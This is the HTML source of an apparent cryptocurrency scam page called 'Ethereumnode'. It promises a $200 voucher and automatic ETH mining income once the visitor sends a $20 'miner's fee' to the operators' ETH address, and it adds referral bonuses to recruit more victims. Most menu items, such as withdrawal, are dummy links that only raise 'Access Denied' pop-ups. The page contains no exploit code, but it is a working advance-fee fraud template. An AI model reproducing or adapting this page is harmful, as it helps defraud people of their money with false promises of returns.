
  <!DOCTYPE html>
  
  <html lang="en">
  
<head>
   <title> Ethereumnode | voucher reward</title>

<meta name="viewport" content="width=device-width, initial-scale=1" />
   <style type="text/css">
   form {
   
   background-color: white;
   
   max-width: 80%;
   max-height: 1000px;
   margin: 5px auto;

   padding: 5px 20px;
   
   box-shadow: 0px 1px 5px rgba(0, 0, 0, 0.2);
   }
   
   body {
   background-image: ul("images/index2.png");
   background-repeat: no-repeat;
   position: relative;
   align: center;
   }
   
   
   
   .ul {
   font-size: 22px;
   color: blue;
   text-align: center;
   }
  
  * {
     box-sizing: border-box;
  }
  html, body {
     margin: 0;
     padding: 0;
  }
  
  .man4 {
       box-shadow: 1px 5px 10px 1px hsla(240, 100%, 50%, 0.3), 0 1px 2px 1px hsla(240, 100%, 50%, 0.1);
       }
       
  .form-container {
     margin: 20px;
     padding: 15px;
     background: #173459;
     color: white;
     box-shadow: 0 5px 10px 0 rgba(0, 0, 0, 0.3), 0 7px 21px 0 rgba(0, 0, 0, 0.20);
  }
  .input-cnt {
     display: flex; /* display the icon and the input in a line */
     margin-bottom: 15px;
  }
  .input-cnt:last-child {
     margin-bottom: 0px;
  }
  .input-cnt > i {
     min-width: 40px; /* set a minimum width for the icon */
     padding: 10px; /* make sure the icon is centered vertically */
     text-align: center; /* horizontally center the icon */
     background: lightgrey;
     border-top-left-radius: 20px;
     border-bottom-left-radius: 20px;
     color: #0076ff;
  }
  /* change styles when focused */
  .input-cnt:hover > i {
     background: #0076ff;
     color: white;
  }
  /* style the inputs */
  .input-cnt > input[type="text"], .input-cnt > input[type="password"] {
     outline: none;
     border: none;
     padding: 7.20px;
     border: 1px solid lightgrey;
     border-top-right-radius: 20px;
     border-bottom-right-radius: 20px;
     width: 100%;
  }
  /* style the submit button */
  .input-cnt > input[type="submit"] {
     border: none;
     border-radius: 20px;
     outline: none;
     width: 75%;
     margin: 0 auto;
     font-size: 105%;
     padding: 8px;
     color: #0076ff;
     background: white;
     transition-duration: .5s;
  }
  /* add a hover effect for the submit button */
  .input-cnt > input[type="submit"]:hover {
     color: white;
     background: #0076ff;
  }
  

  
  #scan1 {
  border: 20px insert white;
  border-radius: 1px;
  background: hsla(240, 100%, 50%, 0.8);
  
  color: white;
  padding-left: 30px;
  padding-right: 30px;
  margin-right: 1px;
  margin-left: 10px;
  Font-size: 10px;
  
  }
 
 
 * {
 box-sizing: border-box;
 }
 i {
 display: inline-block;
 width: 30px;
 height: 30px;
 background-image: url(images/index4.jp);
 margin-bottom: -5px;
 }
 i.home-icon {
 background-position: top 0 left 0;
 }
 i.envelope-icon {
 background-position: top 0 left -30px;
 }
 i.bell-icon {
 background-position: top 0 left -60px;
 }
 i.dashboard-icon {
 background-position: top 0 left -90px;
 }
 .dd {
 position: relative;
 display: inline-block;
 }
 .dd-btn {
 padding: 1.50%;
 text-align: left;
 background: hsla(250, 100%, 50%, 0.9);;
 border: none;
 width: 370px;
 color: #f8f9f9;
 font-size: 20px;
 }
 .dd-content {
 position: absolute;
 width: 100%;
 box-shadow: 0 18px 36px rgba(0,0,0,0.30), 0 14px 11px rgba(0,0,0,0.22);
 height: 0px;
 transition: height 1s;
 overflow: hidden;
 }
 .dd:hover > .dd-content {
 height: 240px;
 }
 .dd-content > a {
 display: block;
 height: 60px;
 padding: 15px;
 text-decoration: none;
 color: black;
 }
  
  .man5 {
  
  background-color: white;
  
  max-width: 330px;
  
  margin: 5px auto;
  
  padding: 5px 20px;
  
  box-shadow: 2px 3px 6px 2px rgba(0, 0, 0, 0.2);
  
  }
  .man6{
  color: #134580;
  font-size: 16px;
  }
  #uf{
  width: 15%;
  height: auto;
  height:  50px;
  }
  img {
  width: 90%;
  height: 18%;
  }
.ffu {

color: white;
}

 .ffuu {
  
  background-color: hsla(240, 100%, 50%, 0.8);
  
  max-width: 100%;
  max-height: 1000px;
  margin: 5px auto;
  
  padding: 5px 20px;
  
  box-shadow: 0px 1px 5px rgba(0, 0, 0, 0.2);
  }
  
  /* drop down style */
  
  
  * {
  box-sizing: border-box;
  }
  html, body {
  margin: 0;
  padding: 0;
  }
  .container {
  margin: 15px;
  }
  input[type="radio"] {
  display: none; /* hide the radio button because it does not look beautiful */
  }
  .container {
  border: 1px solid black;
  border-radius: 5px;
  }
  label {
  display: block;
  padding: 10px;
  border-bottom: 1px solid black;
  color: black;
  background: white;
  }
  .accordion:last-child > label, .accordion:last-child > .accordion-content {
  border: none;
  }
  .accordion-content {
  border-bottom: 1px solid black;
  padding: 15px;
  display: none;
  }
  /* select the accordion content when the label is clicked on or the input is checked */
  input:checked ~ .accordion-content {
  display: block;
  }
  
  .fuckyou {
  
  background-color: white;
  
  max-width: 95%;
  max-height: 40%;
  margin: 5px auto;
  
  padding: 10px 20px;
  
  box-shadow: 0px 1px 5px rgba(0, 0, 0, 0.2);
  font-size: 11.50px;
  }
  
  .n{
  background-image: url("images/index2.png");
  color: red;












  }
   .container1 {
      position: relative;
      height: 207px;
   }

   .vv {
      position: absolute;
      top: 5px;
      left: 0px;
   }
  
  .img1 {
     width: 95%;
     height: auto;
     height: 150px;
      padding-left: 50%;
  background-color: wite;

 margin-left: 5px;
  filte: brightness(0);


  }
  
  
  .vv1 {
  border: 50px insert white;
  border-radius: 7px;
  background: hsla(240, 100%, 50%, 0.8);
      
  color: white;
  padding-left: 35px;
  padding-right: 35px;
  margin-right: 5px;
  margin-left: 1px;
  Font-size: 18px;
  
  }
     
      
      
      
      
      
      .container {
         position: relative;
         }
         
   #fuck3 {
   
   width: 13%;
   height: 7%;
   }
   
         
         h6j {
         border: 1px inset #0076ff;
         border-radius: 10px;
         background: white;
         color: #134580;
         padding-left: 0.50px;
         padding-right: 4px;
         margin-right: 17px;
         margin-left: 0.50px;
         Font-size: 19px;
         }
        
  
       
       .p1 {
       border: 50px insert black;
       border-radius: 8px;
       background: white;
       
       color: blue;
       padding-left: 50px;
       padding-right: -2px;
       margin-right: 29px;
       margin-left: -2px;
       Font-size: 18px;
              box-shadow: 2px 3px 6px 2px rgba(0, 0, 0, 0.2);
       }
       
       .fuckyou2 {
       
       background-color: white;
       
       max-width: 90%;
       max-height: 40%;
       margin: 5px auto;
       
       padding: 5px 20px;
       
       box-shadow: 0px 1px 5px rgba(0, 0, 0, 0.2);
       }
         
         


       
       .button2:hover {
       background-color: white;
       color:   blue;
       border: none;
   box-shadow: 1px 1px 1px 1px   hsla(0, 0%, 0%, 0.9);
   cursor: pointer;
   -webkit-transition-duration: 0s; /* for Safari */
   transition-duration: 0s;
   }
       .button2 {
                outline: none;
       border: none;
       height: 43.40px;
       width: 90%;
          box-shadow: 1px 1px 1px 1px   hsla(0, 0%, 0%, 0.9);
       border-radius: 30px;  
       bordner: 12px;
       font-size: 15px;
       background: white;
       color:  white;
       background:     hsla(240, 100%, 25%, 0.9);
       
       }
       

       #fuck43 {
       position: relative;
       top: -204.50px;
       float: right;
       border-radius: 2000%;
       width: 7.50%;
       height: 4.50%;

       padding: 5px;
       }
       
     /*  .span2 {
       margin-left: 100%;
       } */
       

       
       
       
       
       
       /*Menu*/
       
       
       
       /* The side navigation menu */
       .sidenav {
       height: 100%; /* 100% Full-height */
       width: 0; /* 0 width - change this with JavaScript */
       position: fixed; /* Stay in place */
       z-index: 1; /* Stay on top */
       top: 0; /* Stay at the top */
       left: 0;
       background-color:   hsla(240, 100%, 25%, 1); /* Black*/
       overflow-x: hidden; /* Disable horizontal scroll */
       padding-top: 60px; /* Place content 60px from the top */
       transition: 0.5s; /* 0.5 second transition effect to slide in the sidenav */
       }
       
       /* The navigation menu links */
       .sidenav a {
       padding: 8px 8px 8px 32px;
       text-decoration: none;
       font-size: 16.50px;
       color: hsla(0, 100%, 100%, 0.9);
       display: block;
       transition: 0.3s;
       }
       
       /* When you mouse over the navigation links, change their color */
       .sidenav a:hover {
         color: hsla(120, 100%, 50%, 0.8);
       }
       
       /* Position and style the close button (top right corner) */
       .sidenav .closebtn {
       position: absolute;
       top: 0;
       right: 25px;
       font-size: 36px;
       margin-left: 50px;
       }
       
       /* Style page content - use this if you want to push the page content to the right when you open the side navigation */
       #main {
       transition: margin-left .5s;
       padding: 20px;
       }
       
       /* On smaller screens, where height is less than 450px, change the style of the sidenav (less padding and a smaller font size) */
       @media screen and (max-height: 450px) {
       .sidenav {padding-top: 15px;}
       .sidenav a {font-size: 18px;}
       }
       

       /*End*/
       
       
       .tr1 {
       
       position: relative;
       top: -28.50px;
       }
       
       
       
       
       
       
       
       
       

/*Alert Box*/

#modalContainer {
background-color:rgba(0, 0, 0, 0.5);
position:absolute;
width:100%;
height:100%;
top:0px;
left:0px;
z-index:10000;
background-image:url(tp.png); /* required by MSIE to prevent actions on lower z-index elements */
}

#alertBox {
border-radius: 7px;
position: relative;
top: 160px;
position:relative;
width: 290px;
min-height:150px;
margin-top:50px;
border: none
border-radius: 10px;
background-color:#fff;
background-repeat:no-repeat;
background-position:20px 30px;
}

#modalContainer > #alertBox {
position:fixed;
}

/*confirmation fell*/
#alertBox h1 {

position: relative;
top: 8px;
text-align: center;
margin:0;
font:bold 0.97em verdana,arial;
background-color: #fff;
color: black;
border-bottom: none;
padding:2px 0 2px 5px;
}


/*text on confrmation fell*/
#alertBox p {
position: relative;
top: 3px;

font:0.80em verdana,arial;
height:50px;
text-align: center;


}

/*alertbox Ok*/

#alertBox #closeBtn {

top: 3px;
display:block;
position:relative;
margin:5px auto;
padding:7px;
border:0 none;
width:70px;
font:0.9em verdana,arial;

text-align:center;
color:#FFF;
   background:     hsla(240, 100%, 25%, 0.9);
border-radius: 5px;
text-decoration:none;
}

/* unrelated styles */

#Container {
position:relative;
width:600px;
margin:auto;
padding:5px;
border-top:2px solid #000;
border-bottom:2px solid #000;
font:0.7em verdana,arial;
}

h1,h2 {
margin:0;
padding:4px;
font:bold 1.5em verdana;
border-bottom:1px solid #000;
}

code {
font-size:1.2em;
color:#069;
}

#credits {
position:relative;
margin:25px auto 0px auto;
width:350px; 
font:0.7em verdana;
border-top:1px solid #000;
border-bottom:1px solid #000;
height:90px;
padding-top:4px;
}

#credits img {
float:center;
margin:5px 10px 5px 0px;
border:1px solid #000000;
width:80px;
height:79px;
}

.important {
background-color:#F5FCC8;
padding:2px;
}

code span {
color:green;
}
   
   
   /*End*/






       
       /*
       .button22:hover {
             border-radius: 1px;  
       background-color: white;
       color:   blue;
       border: none;
       bhox-shadow: 1px 1px 1px 1px   hsla(240, 100%, 25%, 0.9);
       cursor: pointer;
       -webkit-transition-duration: 1s; /* for Safari */
       transition-duration: 1s;
       }
       /*
       .button223 {
       position: relarive;
       top: 3px;
                outline: none;
       border: none;/*
    /*   height: 20px;
       width: 90%; *//*
       border-radius: 30px;  
       bordner: 12px;
       font-size: 25px;
       background: white;
       color:  white;
       background:     hsla(240, 100%, 25%, 0.9);
       -webkit-transition-duration: 1s; /* for Safari *//*
       transition-duration: 1s;
       }
       
       .button22 {
       position: relative;
       top: 15px;
                outline: none;
       border: none;
           /*   height: 20px;
       width: 90%; */
  /*     border-radius: 30px;  
       bordner: 12px;
       font-size: 25px;
       background: white;
       color:  white;
       background:     hsla(240, 100%, 25%, 0.9);
       -webkit-transition-duration: 1s; /* for Safari */
    /*   transition-duration: 1s;
       }
       */



      
      
      
      
      
    /*  right side menu */
    
    

    /* Global */
    .container{
    width:80%;
    margin:auto;
    overflow:hidden;
    }
    
    ul{
    margin:0;
    padding:0;
    }
    
    .button_1{
    height:38px;
    background:#e8491d;
    border:0;
    padding-left: 20px;
    padding-right:20px;
    color:#ffffff;
    }
    
    .dark{
    padding:15px;
    background:#35424a;
    color:#ffffff;
    margin-top:10px;
    margin-bottom:10px;
    }
    
    /* Header **/
    /*u1*/
    header{

    color: black;
    padding-top:30px;
    min-height:70px;

    }
    /*u2*/
    
    header a{

    text-decoration:none;

    font-size:16px;
    }
    /*u3*/
    header li{
    float:left;
    display:inline;
    padding: 0 20px 0 20px;
    }

    header #branding{
    float:left;
    }
    
    header #branding h1{
    margin:0;
    }
    
    header nav{
    float:right;
    margin-top:10px;
    }
    
    
    /*u5*/
  /*   header .highlight, header .current a{
    color: black;
    font-weight:bold;
    */
    
    header a:hover{
    color:#cccccc;
    font-weight:bold;
    }
    
    /* Showcase */
    #showcase{
    min-height:400px;

    background-position: center;
    background-size: cover;
    text-align:center;
    color:#ffffff;
    }
    
    #showcase h1{
    margin-top:100px;
    font-size:55px;
    margin-bottom:10px;
    }
    
    #showcase p{
    font-size:20px;
    }
    
    /* Newsletter */
    #newsletter{
    padding:15px;
    color:#ffffff;

    }
    
    #newsletter h1{
    float:left;
    }
    
    #newsletter form {
    float:right;
    margin-top:15px;
    }
    
    #newsletter input[type="email"]{
    padding:4px;
    height:25px;
    width:250px;
    }
    
    /* Boxes */
    #boxes{
    margin-top:20px;
    }
    
    #boxes .box{
    float:left;
    text-align: center;
    width:30%;
    padding:10px;
    }
    
    #boxes .box img{
    width:90px;
    }
    
    /* Sidemenu */
    aside#sidemenu{
    float:right;
    width:30%;
    margin-top:10px;
    }
    
    aside#sidemenu .quote input, aside#sidemenu .quote textarea{
    width:90%;
    padding:5px;
    }
    
    /* Main-col */
    article#main-col{
    float:left;
    width:65%;
    }
    
    /* Services */
    ul#services li{
    list-style: none;
    padding:20px;
    border: #cccccc solid 1px;
    margin-bottom:5px;

    }
    
    footer{
    padding:20px;
    margin-top:20px;
    color:#ffffff;

    text-align: center;
    }
    
    /* Media Queries */
    /*u6*/
    @media(max-width: 768px){
    header #branding,
    header nav,
    header nav li,
    #newsletter h1,
    #newsletter form,
    #boxes .box,
    article#main-col,
    aside#sidemenu{
    float:none;
    text-align:center;
    width:100%;
    }
    
    header{
    padding-bottom:20px;
    }
    
    #showcase h1{
    margin-top:40px;
    }
    
    #newsletter button, .quote button{
    display:block;
    width:100%;
    }
    
    #newsletter form input[type="email"], .quote input, .quote textarea{
    width:100%;
    margin-bottom:5px;
    }
    }
    
    
    
     
     
     
     
     
     
     
     header .highlight, header .current a{
     position: relative;
     color: black;
     font-weight:bold;

     
     


     }

     
     
     header .highlight, header .current2 a{
     color: grey;
     font-weight:bold;
     }
    


     .ui {
     border-button: 30px red;
     font-weight:bold;
     height: 300px;
     color: red;
   }
   
   
   
   
   
   .button2i:hover {

   color:  white  ;
   border: none;
      background:    hsla(240, 100%, 25%, 0.9);;
      box-shadow: 1px 1px 1px 1px   hsla(0, 0%, 0%, 0.9);
      cursor: pointer;
      -webkit-transition-duration: 0s; /* for Safari */
      transition-duration: 0s;
      }
   
   
     .button2i {
   outline: none;
   border: none;
   height: 40px;
   width: 30%;
   box-shadow: 1px 1px 1px 1px   hsla(0, 0%, 0%, 0.9);
   border-radius: 30px;  
   bordner: 12px;
   font-size: 15px;



   background:     #fff;
   
   }

  
  
  
  
  .button2ii:hover {
  background-color: white;
  color:   blue;
  border: none;
     box-shadow: 1px 1px 1px 1px   hsla(0, 0%, 0%, 0.9);
     cursor: pointer;
     -webkit-transition-duration: 0s; /* for Safari */
     transition-duration: 0s;
     }
  

    .button2ii {
    outline: none;
    border: none;
    height: 40px;
    width: 30%;
    box-shadow: 1px 1px 1px 1px   hsla(0, 0%, 0%, 0.9);
    border-radius: 30px;  
    bordner: 12px;
    font-size: 15px;
    background: white;
    color:  white;
    background:     hsla(240, 100%, 25%, 0.9);
    
    }
    

    .sidenav a.active{
    color: hsla(120, 100%, 50%, 0.8);
    }
    
    
    
    
    
    
    
    
    
    
    
    .vv {
    position: absolute;
    top: 13px;
    left: 8px;
    }
    
    
    #fuck43 {
    position: relative;
    top: -235.50px;
    float: right;
    border-radius: 2000%;
    width: 7.50%;
    height: 4.50%;
       margin: 3px; 
    padding: 5px;
    }
    
    
    .img1 {
    position: relative;
    top: 32px;
    width: 95%;
    height: auto;
    height: 150px;
    padding-left: 50%;
    background-color: wite;
    
    margin-left: 5px;
    filte: brightness(0);
    
    
    }
    
    
    .container1 {
    position: relative;
    height: 240px;
    }
    
    
         #fuck3 {
         
         width: 13%;
         height: 5%;
         }
         
         .button2 {
         position: relative;
         top: 8px;
         outline: none;
         border: none;
         height: 45px;
         width: 83%;
         box-shadow: 1px 1px 1px 1px   hsla(0, 0%, 0%, 0.9);
         border-radius: 30px;  
         bordner: 12px;
         font-size: 15px;
         background: white;
         color:  white;
         background:     hsla(240, 100%, 25%, 0.9);
         
         }
         
         
         
         
       .pin {
         position: relative;
       top: -8px;  
      }
      
      
             .nnn {
      position: relative;
             top: -16px}
             }
             
             .sidenav a {
             padding: 8px 8px 8px 32px;
             text-decoration: none;
             font-size: 16px;
             color: hsla(0, 100%, 100%, 0.9);
             display: block;
             transition: 0.3s;
             }
             
             
             
             
             
             #fuck443 {
             position: relative;
             top: 18px;
             floaht: right;
             border-radius: 2000%;
             width: 20.50%;
             height: 4.50%;
             
             padding: 5px;
             }
             
             .ahctive {
             position: relative;
             top: -5px;
             }
             
             }
             
             .act { 

             position: relative;
             top: -500px;
             }
             
       
       
       
       
       #fuck443 {
       position: relative;
       top: 17.50px;
       floaht: right;
       border-radius: 2000%;
       width: 20.50%;
       height: 4.50%;
       
       padding: 5px;
       }
       
       .ahctive {
       position: relative;
       top: -5px;
       }
       
       }
       
       .act { 
       
       position: relative;
       top: -500px;
       }
       
                
                
                #fuck4433 {
                position: relative;
                top: 10px;
                floaht: right;
                borbder-radius: 2000%;
                width: 14.50%;
                height: 2.50%;
                
                padding: 5px;
                }
                
                
                
                #fuck4433i {
                position: relative;
                top: 10px;
                floaht: right;
                border-radius: 100%;
                width: 14.50%;
                height: 2.500%;
                
                padding: 5px;
                }
</style>
</head>
      <body style="font-size: 15px; font-family: 'Montserrat Alternates', sans-serif;">



      
      <div class="container1" style="background-color: hsla(240, 100%, 50%, 0.7); color: white">
  <span>&nbsp;</span>
  <span>&nbsp;</span>
    <span>&nbsp;</span>
    
  
  
  <span>&nbsp;</span>
  <span>&nbsp;</span>
    <span>&nbsp;</span>
      <span>&nbsp;</span>
        <span>&nbsp;</span>
          <span>&nbsp;</span>
            <span>&nbsp;</span>







      <img class="img1"src="https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img51.png" />
      <span class="vv"><b>
      

         

         
         
       <small> <b>     <!--    <a href="menu.html"style="text-decoration: none;"> -->      

        
        <div id="mySidenav" class="sidenav">
        <a href="javascript:void(0)" class="closebtn" onclick="closeNav()">&times;</a>
            
                  <a  class="ahctive"href="##"    
                      onclick="alert(&apos;You need to join mining to have access on this feature.&apos;);" />        
                                               <img id="fuck443" src="https://raw.githubusercontent.com/Bitcoinsminer/Img/main/img155.png" />Profile</a>   
                                               </a>
        
                                               <hbr>
                                                                       <a class="acbt"href="##"><hr class="act"></a>
            <a class="active"href="voucher.html"><img id="fuck4433" src="https://raw.githubusercontent.com/Bitcoinsminer/Img/main/img117.png" />voucher</a>
        
        
         
          
          
          
          
        
          
          
          
        <a href="##"  onclick="alert(&apos;You need to join mining to have access on this feature.&apos;);" /><img id="fuck4433" src="https://raw.githubusercontent.com/Bitcoinsminer/Img/main/img118.png" />Mining Dashboard</a>
        <a href="##"  onclick="alert(&apos;You need to join mining to have access on this feature.&apos;);" /><img id="fuck4433" src="https://raw.githubusercontent.com/Bitcoinsminer/Img/main/img117.png" />Withdraw</a>
        
        <a href="##"  onclick="alert(&apos;You need to join mining to have access on this feature.&apos;);" /><img id="fuck4433" src="https://raw.githubusercontent.com/Bitcoinsminer/Img/main/settings.png" />Settings</a>
        <a href="deposit.html"><img id="fuck4433" src="https://raw.githubusercontent.com/Bitcoinsminer/Img/main/img21.png" />deposit</a>
              <!--  <a href="##"><img id="fuck4433" src="https://raw.githubusercontent.com/Bitcoinsminer/Img/main/img117.png" />Exchange Coins</a>-->
        <a href="customerservice.html"><img id="fuck4433" src="https://raw.githubusercontent.com/Bitcoinsminer/Img/main/img116.png" />Customer Service</a>
        <a href="##"     onclick="alert(&apos;You need to join mining to have access on this feature.&apos;);" /><img id="fuck4433i" src="https://raw.githubusercontent.com/Bitcoinsminer/Img/main/img100.png" />Invitation Link</a>
        <a href="Help-center.html"><img id="fuck4433" src="https://raw.githubusercontent.com/Bitcoinsminer/Img/main/help.png" />Help Center</a>
        <a href="##"  onclick="alert(&apos;You need to join mining to have access on this feature.&apos;);" /><img id="fuck4433" src="https://raw.githubusercontent.com/Bitcoinsminer/Img/main/use.png" />Activities</a>
        <a href="login.html"><img id="fuck4433" src="https://raw.githubusercontent.com/Bitcoinsminer/Img/main/logout.png" />Log Out</a>                <span>&nbsp;</span>                <span>&nbsp;</span>
                  <!--     <a href="deposit..html"style="text-decoration: none;"><button class="button22">Receive</button></button></a></p>
        
                               <a href="deposit..html"style="text-decoratiron: none;"><button class="button223">Receive</button></button></a></p>
        -->
        </div>
        
        <!-- Use any element to open the sidenav -->
        <span onclick="openNav()">
        
        
        
        
                  <img id="fuck3" src="https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img61.jpg" /></a>
        
        
        
        </span>
        
        <!-- Add all page content inside this div if you want the side nav to push page content to the right (not used if you only want the sidenav to sit on top of the page -->
        <div id="main">
        
        </div>
        
        

          </b></dd></small>
      </b>   <span class="tr1">
       <p><h3>Receive Voucher $200</h3></p>
       <section style="font-size: 11.50px">To join the node and start mining ETH,</section>
              <section style="font-size: 11.50px"> you need to pay an ETH miner&apos;s fee $20  </section>
                            <section style="font-size: 11.50px"> and receive $200 voucher reward.</section>
                        <!--    
                                  <p class="p1">      <a href="deposits.html"style="text-decoration: none;"><b>
                             <!--     &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                          <!--    receive</b></a>  </p>  </span>
     -->
        



               <p><a href="deposit.html"style="text-decoration: none;"><button class="button2">Receive</button></button></a></p>
       
       
       </span>
            <span>&nbsp;</span>
            <span>&nbsp;</span>
                <span>&nbsp;</span>
                                  <span>&nbsp;</span></div> 
                                  

                                  
                                  

                                     <!-- <a href="##" >--><img id="fuck43" src="https://raw.githubusercontent.com/Ethereumnode/Ethereumnode-Img/main/img91.jpg" /></a>    
                     <!--             <p style=""><center><b style="color: blavk; font-size: 12px">Help</b><span>                                <b style="color: grey; font-size: 12px">Help</b></center></p>
                                  
                                  
                                  
                  -->                
                                  
                                  
                   <header>




                   
                   
                   
                   
                   
                   
                   <nav>
                   <ul>
                   <li class="current"><a href="##"><button class="button2ii">Help</button></a></li>
                          <li class="current2"><a href="##"><button class="button2i"     onclick="alert(&apos;To join the node and start mining, you need to first receive $200 voucher reward.&apos;);" />Mining</button></a></li>
  
                   </ul>
                   </nav>
                   
                   
                   
                  
                   
                   </div>
                   </header>
                   
                   
                                  
                                  
                                  
                                  
                                  
                                  
                                  <!-- drop down style-->
                                  
                                  
                                  
                                  <form class="fuckyou">
                                  <div class="accordion">
                                  <input type="radio" name="accordion" id="accordion1">
                                  <label for="accordion1"><b><section style="font-size: 9px">How do i join node?     <span class="span2"></span></dd></section></small></b></label>
                                  <div class="accordion-content">
                                  <section>
                            To join the node and starting mining ETH,  you need to pay an ETH miner&apos;s  fee of $20 to receive a voucher reward $200, and automatic open mining permissions after success.
                                  </dd></section>
                                  </div>
                                  </div>
                                  </div>
                                  </form>
                                  
                                  
                                  
                                  
                                  <form class="fuckyou">
                                  <div class="accordion">
                                  <input type="radio" name="accordion" id="accordion6">
                                  <label for="accordion6"><b><section style="font-size: 9px"> How do i withdraw money?
                                   <span class="span2"></span>
                                   </section></b></label>
                                    <div class="accordion-content">
                                  <section>You can withdraw money by applying a withdrawal on the mining field and then enter amount to withdraw. The withdraw will be automatically send to the address you added to the node. keep in mind there will be no withdraw fee charge when withdrawing money.</section>
                                  </div>
                                  </div></form>
                                  
                                  
                                  
                                  <form class="fuckyou">
                                  <div class="accordion">
                                  <input type="radio" name="accordion" id="accordion3">
                                  <label for="accordion3"> <b><section style="font-size: 9px">How do i pay for miner&apos;s  fee?     <span class="span2"></span></section></b></label>
                                  <div class="accordion-content">
                                  <section>When you log In to your account, you will see button named &apos;&apos;receive&apos;&apos; click on the button (Receieve) and follow instructions showing on the page to pay for miner&apos;s  fee of $20 ETH. please when sending payment to our ETH address, ensure that you are sending only Ethereum(ETH). sending any other crypto currency coin are not supported. If you find it difficult to find our ETH address on our node page, <a href="deposit.html"style="text-decoration: none; color: blue">click here</a>  to show our full payment details. </section>
                                  </div>
                                  </div></form>
                                  <form class="fuckyou">
                                  <div class="accordion">
                                  <input type="radio" name="accordion" id="accordion8">
                                  <label for="accordion8"><b><section style="font-size: 9px">What much calculation income will I be mining?     <span class="span2"></span></section></b></label>
                                  <div class="accordion-content">
                                  <section>When you join node successfully, our system will automatically start to calculate you a total of 0.022 ETH you will be mining every 6 hours. You can also increase your mining through inviting friends to the node with your invitation link.<section>
                                  </div>
                                  </div>
                                  </form>
                                  
                                  
                                  
                                  
                                  
                                  <form class="fuckyou">
                                  <div class="accordion">
                                  <input type="radio" name="accordion" id="accordion4">
                                  <label for="accordion4"><b><section style="font-size: 9px"> Can i earn more ETH from inviting friends?     <span class="span2"></span></section></b></label>
                                  <div class="accordion-content">
                                  <section>Yes! When you join node successfully, you will get personal invitation link. Each friend you invited with your invitation link, you will get 0.111 ETH.<a href="##"style="text-decoration: none; color: blue;"      onclick="alert(&apos;You need to join node mining to have access on this feature.&apos;);" > Click here</a> to get your invitation link.</section>
                                  </div>
                                  </div></form>
                                  
                                  

                                  
                                  <form class="fuckyou">
                                  <div class="accordion">
                                  <input type="radio" name="accordion" id="accordion0">
                                  <label for="accordion0"><b><section style="font-size: 9px">Can i exchange my coins with this mining site?     <span class="span2"></span></section></b></label>
                                  <div class="accordion-content">
                                  <section>Yes! We support exchanging coins on this our mining site, but at this moment, we only support exchaging ETH to USDT-erc20, other coins can not be excahnge on this our mining site. keep in mind we don&apos;t charge for exchange fee, you can exhenge your coins without exchange fee taking out from your coin. </section>
                                  </div>
                                  </div></form>
                                  
                                  
                                  
                                  
                                  
                                  
                                  
          
                                  
                                  
                        <!--        <p>  <form class="fuckyou2"> <b> <section><p><center style="font-size: 8.50px"> Please <a href="help-center.html"style="text-decoration: none; color: blue">click here</a> to read more help Instructions</center></p></section></b></form>
                                  
                                </p>-->
                                <span>&nbsp;</span>
                                <h r>
                                  
                                  
                                  
                                  <script type="text/javascript">
                                  
                                  
                                  
                                  
                                  /* Set the width of the side navigation to 250px */
                                  function openNav() {
                                  document.getElementById("mySidenav").style.width = "250px";
                                  }
                                  
                                  /* Set the width of the side navigation to 0 */
                                  function closeNav() {
                                  document.getElementById("mySidenav").style.width = "0";
                                  }
                                  
                                  </script>
                                  
                                  
                                  
                                  <script type="text/javascript">
                                  
                                  
                                  
                                  
                                  
                                  
                                  
                                  var ALERT_TITLE = "Access Denied";
                                  var ALERT_BUTTON_TEXT = "Ok";
                                  
                                  if(document.getElementById) {
                                  window.alert = function(txt) {
                                  createCustomAlert(txt);
                                  }
                                  }
                                  
                                  function createCustomAlert(txt) {
                                  d = document;
                                  
                                  if(d.getElementById("modalContainer")) return;
                                  
                                  mObj = d.getElementsByTagName("body")[0].appendChild(d.createElement("div"));
                                  mObj.id = "modalContainer";
                                  mObj.style.height = d.documentElement.scrollHeight + "px";
                                  
                                  alertObj = mObj.appendChild(d.createElement("div"));
                                  alertObj.id = "alertBox";
                                  if(d.all && !window.opera) alertObj.style.top = document.documentElement.scrollTop + "px";
                                  alertObj.style.left = (d.documentElement.scrollWidth - alertObj.offsetWidth)/2 + "px";
                                  alertObj.style.visiblity="visible";
                                  
                                  h1 = alertObj.appendChild(d.createElement("h1"));
                                  h1.appendChild(d.createTextNode(ALERT_TITLE));
                                  
                                  msg = alertObj.appendChild(d.createElement("p"));
                                  //msg.appendChild(d.createTextNode(txt));
                                  msg.innerHTML = txt;
                                  
                                  btn = alertObj.appendChild(d.createElement("a"));
                                  btn.id = "closeBtn";
                                  btn.appendChild(d.createTextNode(ALERT_BUTTON_TEXT));
                                  btn.href = "#";
                                  btn.focus();
                                  btn.onclick = function() { removeCustomAlert();return false; }
                                  
                                  alertObj.style.display = "block";
                                  
                                  }
                                  
                                  function removeCustomAlert() {
                                  document.getElementsByTagName("body")[0].removeChild(document.getElementById("modalContainer"));
                                  }
                                  
                                  
                                  
                                  
                                  
                                  </script>
                                  
                                  
                                  
                                  </body>
                                  
                                  
                                  
                                  
                                  
                                  
                            
                            
                            
                            
                            
                            
                            
                            
                            
  <!--    <p><small><dd style="font-size: 13.30px">Eth-hub is a standard ETH cryptocurrency mining <br>company that offers a high degree of profitable<br> partnership to ETH cryptocurrency  miner&apos;s through<br> which they can legally earned Ethereum by joining<br> eth-hub, miner&apos;s acquire the legal right and<br> secured way to earn Ethereum through our <br>mining node pool.</dd>
      </small></p></span></spnn></span></div></p></a>
      
      <p>&nbsp;</p>
      
            <section><p>receive the first login voucher reward $200.</p></section>
      
      
      -->